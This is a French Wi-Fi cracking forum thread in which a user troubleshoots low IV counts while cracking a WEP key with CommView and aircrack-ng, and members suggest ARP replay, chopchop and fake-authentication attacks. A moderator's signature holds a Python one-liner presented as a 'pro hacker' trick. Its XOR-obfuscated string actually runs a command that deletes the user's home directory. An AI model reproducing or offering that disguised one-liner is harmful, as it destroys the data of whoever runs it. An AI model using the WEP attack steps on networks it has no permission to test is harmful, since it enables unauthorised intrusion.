Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 19-09-2011 08:26:35

odix19
Membre Actif
Inscription : 14-09-2011
Messages : 29

500000 ivs mais il a affiché que 803

salut j'ai voulu cracker une clé wep  sous backtrack 5j'ai collecté a peu pres 500000 ivs mais il a affiché que 803 dans aircrack et il m'a dit failed next try 5000ivs et je me demmande pourquoi il n'a pas utilisé tout les paquets est ce parceque ils sont endommagé????.j'ai essayé la meme chose avec commview sous vista car j'ai une carte wifi compatible atheros mais le probleme c'est que ça a pris pour collecter 500000 ivs 10 heures et il m'a affiché 815 ivs sous aircrack-ng 1.1 xp  j'ai 2 question ici pour quoi ça a pris tout ce temp pour ramasser tout ces paquets est ce a cause de station parceque personne n'est connnecté ?est ce que je peux cracker une clé wep facilement comme si c'etait sous backtrack? MERCI DE ME REPONDRE LE PLUTOT POSSIBLE

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 19-09-2011 09:47:56

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : 500000 ivs mais il a affiché que 803

J'espère que c'est assez tôt pur toi hmm roll
Tu es sûr que tu regardes pas les beacons à tout hasard?
Si il n'y a pas de station et que tu ne fais pas de fake auth et d'attaque, c'est normal que ça prenne du temps, beaucoup de temps indépendamment du fait que tu sois sous windows ou backtrack.
Avec commview ta vitesse d'injection est limitée a 300 datas/segondes, sous lnux tu peux dépasser ce seuil de 300.

Hors Ligne

#3 19-09-2011 09:48:41

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : 500000 ivs mais il a affiché que 803

odix19 a écrit :

MERCI DE ME REPONDRE LE PLUTOT POSSIBLE

Pour commencer évite de marquer en MAJ.
Ensuite je pense que tu et trop loin de TON PROPRE réseau,tu devrais stimuler un peut en mettant un pc en wifi chez toi.


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#4 19-09-2011 10:11:26

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : 500000 ivs mais il a affiché que 803

Moi je dis qu'il a injecté un paquet d'IV's, mais qu'il n'est pas associé au réseau et donc les IV ne sont pas acceptés...

Mais sa remarque en majuscule c'est typiquement le genre de trucs qui me gonfle donc je n'en dirai pas plus.
Non mais, aucune patience ces jeunes...

Hors Ligne

#5 19-09-2011 10:41:08

odix19
Membre Actif
Inscription : 14-09-2011
Messages : 29

Re : 500000 ivs mais il a affiché que 803

qu'est ce que ça te fais si je marque en MAJ goliate.en plus j'ai un reseau wifi personnel mon signal est 95% en plus j'ai un pc portable avec carte wifi compatible atheros je n'ai pas posé une question pour que quelqu'un repond a  autre chose

Hors Ligne

#6 19-09-2011 10:45:52

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : 500000 ivs mais il a affiché que 803

TON PROBLÈME EST FACILE A RÉGLER VA VOIR LES TUTOS SUR LE SITE.

Amicalement, bien entendu.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#7 19-09-2011 10:47:22

odix19
Membre Actif
Inscription : 14-09-2011
Messages : 29

Re : 500000 ivs mais il a affiché que 803

merci spawn
qu'est ce que ça te fais si je marque en MAJ goliate.en plus j'ai un reseau wifi personnel mon signal est 95% en plus j'ai un pc portable avec carte wifi compatible atheros je n'ai pas posé une question pour que quelqu'un repond a  autre chose

je vais reformuler les questions :
pourquoi ça a pris tout ce temps(10 heurs) pour accumuler 500000 ivs est ce a cause des station non connecté en sachant je crack mon propre reseau si c'est oui c'est bon,si c'est non pourquoi ?
et pourquoi dans aircrack-ng xp il m'affiche 815 ivs au lieu de 500000,il me dit failed next try in 5000 ça je l'ai compris parceque j'ai que 815 mais pourquoi? en sachant que 500000 ivs c'est les paquets que j'ai accumulé sous commview ?merci de repondre a mes questions

Dernière modification par odix19 (19-09-2011 11:08:42)

Hors Ligne

#8 19-09-2011 11:33:10

noireaude
Membre d'honneur
Lieu : Chez le docteur
Inscription : 12-03-2010
Messages : 2 362
Site Web

Re : 500000 ivs mais il a affiché que 803

odix19 a écrit :

qu'est ce que ça te fais si je marque en MAJ goliate.en plus j'ai un reseau wifi personnel mon signal est 95% en plus j'ai un pc portable avec carte wifi compatible atheros je n'ai pas posé une question pour que quelqu'un repond a  autre chose

Ca revient à crier, c'est comme dans sur un chat, en plus la, tu viens de nous refaire un duplicate content en copiant un phrase pour ouvrir une autre réponse au lieu d'éditer l'autre.
Encore une entorse au règlement .....

Je te l'ai déjà dit pourtant ici tu es sur un FORUM (oui je cire) les gens répondent (ou pas) quand ils le veulent et quand ils le veulent.
Les majuscules ne sont donc pas nécessaire, je te le redis si tu es pressé  il y a les irc.

Ca commence à devenir fatiguant de te reprendre constement.

Bon je te donne quand même une piste tu peux avoir des données datant d'une autre capture, si c'est le cas au moment ou tu lances aircrack, il te demande qu'elle cible tu veux choisir, la il faut prendre celle que tu est en train de cracker.

Pourquoi cela prend autant de temps ? Peut être que ton injection est foireuse et qu'en fait tu effectue un crack passif (ps je ne rentre pas dans les détails, tu peux te servir de google pour faire une recherche la dessus).


L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Hors Ligne

#9 19-09-2011 11:34:02

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : 500000 ivs mais il a affiché que 803

Alors déjà tu va apprendre a bien parler aux gens qui te réponde.Car écrire en MAJ dans un forum reviens a crier dans la vie réel, pour ton post tu as toutes les réponse de plus je doute que se soit ton réseau perso donc.


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#10 19-09-2011 11:36:40

odix19
Membre Actif
Inscription : 14-09-2011
Messages : 29

Re : 500000 ivs mais il a affiché que 803

c'est mon reseau personnel j'ai le mot de passe mais pourquoi je ne peux pas le cracker ce n'est qu'un wep en plus je ne sais pas quelle est la relation de ton doute avec mes question je veux juste une reponse

Hors Ligne

#11 19-09-2011 11:39:23

noireaude
Membre d'honneur
Lieu : Chez le docteur
Inscription : 12-03-2010
Messages : 2 362
Site Web

Re : 500000 ivs mais il a affiché que 803

On va calmer le jeux les loulous, je viens de te répondre odix19, chercher une piste avec ça.
Goliate à raison en ce qui concerne les majucsules, si tu ne le savais pas, maintenant tu le sais.

Supprime tous tes fichiers de capture ou au moins ceux qui n'ont rien à voir avec ton dernier essai et recommences ton crack ou recommence à 0 avec de nouveaux fichiers de capture.


L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Hors Ligne

#12 19-09-2011 11:41:46

odix19
Membre Actif
Inscription : 14-09-2011
Messages : 29

Re : 500000 ivs mais il a affiché que 803

en plus c'est toi qui as commancé goliate tu pouvais dire de ne pas ecrire en maj autrement mais comme tu te prend pour je ne sais guere je m'enfiche c'est pas mon probleme c'est normal que je te reponde moi aussi avec une touche personnelle amigos et juste avec toi donc apprend dabord toi a bien repondre .et merci pour tes remarques goliate.

Hors Ligne

#13 19-09-2011 11:43:01

noireaude
Membre d'honneur
Lieu : Chez le docteur
Inscription : 12-03-2010
Messages : 2 362
Site Web

Re : 500000 ivs mais il a affiché que 803

Odix, j'ai dit stop, temps mort !!!
On passe à autre chose ou je lock le topic ok les loulous ?

Pas de bagarre, ici chacun peut exprimer son point de vue ses doutes et chacun peut ne pas être d'accord.

Pas de quoi en revanche pourrir un topic revenons au sujet de celui-ci.


L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Hors Ligne

#14 19-09-2011 11:45:31

odix19
Membre Actif
Inscription : 14-09-2011
Messages : 29

Re : 500000 ivs mais il a affiché que 803

noireaude j'ai tout supprimé et j'ai tout refais je veux savoir si y'a une obligation qu'une station soit connecté parceque 500000 ivs dans 10 heures c'est trop et pourquoi il n'affiche pas tout les paquets dans aircrack-ng.merci

Hors Ligne

#15 19-09-2011 11:57:50

noireaude
Membre d'honneur
Lieu : Chez le docteur
Inscription : 12-03-2010
Messages : 2 362
Site Web

Re : 500000 ivs mais il a affiché que 803

Pour les packets on t'as déjà donné des pistes, donc pas la peine de reposer la question, si on avait eu d'autres idées que celles qu'on a évoquées on t'en aurais fait part.
Pour le moment je ne vois pas d'autres raisons potentielles que celles d'Antarès ou celles que je t'ai donné.

Après oui si tu n'as pas de station connectée c'est normal que cela prenne du temps. (Mon idée de crack passif était pas si bête appremment).
C'est pour cela que dans ce cas on utilise l'attaque chopchop. (Mais commence plutôt par une attaque plus simple).

Pour que le crack soit rapide, il faut stimuler le réseau pour générer du traffic.
Je te conseil donc une chose.

puisque c'est ton réseau tu connecte un pc avant de commencer ton crack.
Tu lances le téléchargement d'un fichier lourd sur la station connecté. Une distibution Linux par exemple.
Une fois que c'est fait tu commence ton crack en utilisant un attaque dite de (rejeux d'arp) option -3 dans aireplay la ça devrait aller tout seul.


L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Hors Ligne

#16 19-09-2011 12:10:02

odix19
Membre Actif
Inscription : 14-09-2011
Messages : 29

Re : 500000 ivs mais il a affiché que 803

désolé noireaude mais je vais detailler car je veux cracker ma clé sous windows et si tu veux m'aider merci car j'en ai marre d'utiliser backtrack usb live parceque je suis obligé de redemarrer mon pc a chaque fois et si au moin j'avais des resultats positifs.
j'utilise la derniere version de commview for wifi avec aircrack-ng 1.1 win1
j'ai scanné et j'ai trouver 2 reseau le 1er en wep c'est le mien le 2eme en wpa cel d'un ami,le signal arrive a 95% j'ai capturé mon reseau et je l'ai laissé toute la nuit pour accumuler les paquets, au bon matin j'ai trouvé 512561 ivs  et c'est ce qu'il a fait j'ai arreté la capture je suis allé au logs pour convertire le fichier en cap apres j'ai utilisé aircrack pour le decryptage mais il a affiché que 815 ivs de mon reseau j'ai clicé sur 1 puis ok,apres il m'a dit failed next try in 5000 ivs et c'est normal car y'en avait que 815.donc pour quoi il a pris tout ce temps  tout ce temps 10 heures moi j'ai cru que je trouverai 30000000 ivs ou plus(si c'est acause de la station non connecté dite le moi) en plus il a utilisé que 815 ivs.merci de repondre

Hors Ligne

#17 19-09-2011 12:17:12

noireaude
Membre d'honneur
Lieu : Chez le docteur
Inscription : 12-03-2010
Messages : 2 362
Site Web

Re : 500000 ivs mais il a affiché que 803

Je t'ai déjà répondu, j'ai bien saisi tes questions je commence à désespérer de voir que tu me reposes pourtant une fois encore les mêmes ......

Je ne peux pas t'en dire plus si ce n'est de ne pas abandonner Bactrack pour tes essais, niveau injection tu n'arriveras pas à grand chose voir à rien avec Windows et tu vas tourner en rond.

Je t'ai déjà expliqué pourquoi tu n'avais pas beaucoup d'IVs et le reste.
Je ne vois pas comment je pourrais te le dire autrement et je ne comprend pas pourquoi tu reviens avec les même questions alors qu'on t'as donné nos réponses ?.....


L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Hors Ligne

#18 19-09-2011 14:45:05

odix19
Membre Actif
Inscription : 14-09-2011
Messages : 29

Re : 500000 ivs mais il a affiché que 803

je sais pourquoi il affiché que 815 ivs c'est parceque j'ai une version d'evaluation de commview 6.3 et je voudrai avoir une complete si y'en a j'ai essayé la version 6.1 mais elle ne contiennent pas ma carte wifi je crois meme le version 6.2

Hors Ligne

#19 24-09-2011 23:19:21

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : 500000 ivs mais il a affiché que 803

DÉSOLÉ DE NE RÉPONDRE QUE MAINTENANT MAIS J'ÉTAIS ABSENT.

Alors avant de t'apporter une réponse pertinente qui te permettra d'avancer, plusieurs remarques:

-comme on te l'a dit, si tu veux des réponses rapides tu vas sur un chan irc ou mieux tu paies un pro du pentest pour te donner des cours, moyennant quelques milliers de $ tu as des formations très intéressantes chez Offsec et là tu auras des réponses immédiates à toutes tes questions (en anglais cela va de soi)

-quand un membre actif de longue date comme goliate te fait une remarque le mieux est d'en tenir compte au lieu de réagir de manière agressive

-avant de poster un minimum de recherche s'impose. En l'occurrence si tu avais effectué ladite recherche, tu aurais vite compris par toi meme qu'en l'absence de client on s'oriente vers des attaques dites "clientless" car en laissant juste tourner airodump tu peux attendre des mois

J'en arrive donc à l'élément intéressant et constructif de ma réponse qui je n'en doute pas te permettra d'avancer dans la bonne direction: winaircrack + commview ça ne fonctionne vraiment pas terrible. Passes sous la distribution linux de ton choix, installes la suite Aircrack-ng et tu auras de meilleurs résultats.

EN ESPÉRANT T'AVOIR AIDÉ ET ENCORE DÉSOLÉ D'AVOIR ÉTÉ SI LONG A TE RÉPONDRE.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.031 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]